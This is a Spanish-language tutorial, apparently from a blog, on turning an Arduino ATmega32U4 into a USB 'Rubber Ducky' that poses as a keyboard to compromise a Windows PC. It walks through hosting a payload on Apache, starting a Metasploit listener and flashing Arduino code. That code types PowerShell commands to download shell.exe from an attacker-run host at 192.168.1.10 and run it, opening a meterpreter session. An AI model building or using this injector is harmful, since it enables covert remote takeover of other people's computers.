RUBER DUKY


Para abordar este tema debemos comprender que es una ruberduky  ya que este proyecto es basado en este una USB Rubber Ducky (o USB Patito de Goma), es un hardware creado por Hak5, el cual, simula ser un pendrive normal, pero en realidad es una herramienta que inyecta pulsaciones de teclas (es un teclado camuflado). Al momento de conectar este USB, es reconocido con un driver Atmel, haciéndose pasar por un teclado normal (para no levantar sospechas y evitar que sea bloqueado por antivirus o firewall) y ejecuta las teclas indicadas en su código.






Figura 1. Arduino ATMEGA 34U4


Para poder realizar este proyecto se utilizó un dispositivo Arduino ATMEGA 34U4 que contiene el chip Atmel por lo cual se podrá hacer la ejecución y simulación del teclado y se poder así realizar la penetración al computador y hacer el debido hackeo.


PASOS:

1) En nuestro sistema operativo Kali Linux se llevarán a cabo los siguientes procesos

1- Buscar la dirección física de red la cual será añadida en nuestro archivo.


2- Crearemos el archivo con una aplicación llamada Ezesploit.



3- Ubicaremos nuestro archivo creado en una carpeta que corresponde a nuestro servidor apache.


4- Encenderemos nuestro servidor apache.


5- pondremos a nuestro pc en modo escucha para que cuando el dispositivo USB se conecte podremos estar dentro del pc utilizaremos el programa Metasploit para realizar está acción.


6- Descargamos la aplicación Arduino ya que desde allí se realizará la programación correspondiente para llevar a cabo el ataque.


7- Conectamos nuestro Arduino y procedemos a programar las acciones correspondientes que ejecutara luego en un powershell, con la librería keyboard ya que este simulara un teclado.



8- La programación tendrá la parte de la dirección de donde se descargar el archivo que nos permitirá acceder al pc y también donde se guardad y luego lo ejecutará automáticamente ya que esa fie la orden que le dimos anteriormente en la programación Arduino.
Cuando ya se a efectuado la ejecución del archivo nos daremos cuenta que aquí nos inició la sesión meterpreter indicando que fue un éxito el hakeo.




código:



#include <Keyboard.h>

void setup() {
  
  Keyboard.begin();
  delay(500);
  Ejecutar();
  Tipear("powershell");
  Enter();
  delay(500);
  Tipear("$client = new-object System.Net.WebClient$client");
  Enter();
  delay(500);
  Tipear("$client.DownloadFile(\'http://192.168.1.10/shell.exe','Desktop/shell.exe')");
  Enter();
  delay(500);
  Tipear("Invoke-item $Env:userprofile/Desktop/shell.exe");
  Enter();
  delay(100);
  Tipear("Exit");
  Enter();
  Keyboard.end();
  digitalWrite(LED_BUILTIN, LOW);
}

void loop() {
}

void Enter(){
  Keyboard.press(KEY_RETURN);
  delay(500);
  Keyboard.release(KEY_RETURN);
  delay(500);
}
void Cerrar(){
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press(KEY_F4);
  delay(500);
  Keyboard.release(KEY_LEFT_ALT);
  Keyboard.release(KEY_F4);
  delay(500);
}

void Tipear(char txt[]){
  Keyboard.print(txt);
  delay(500);
}
void Ejecutar(){
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(500);
}


VÍDEO TUTORIAL 




0 comentarios: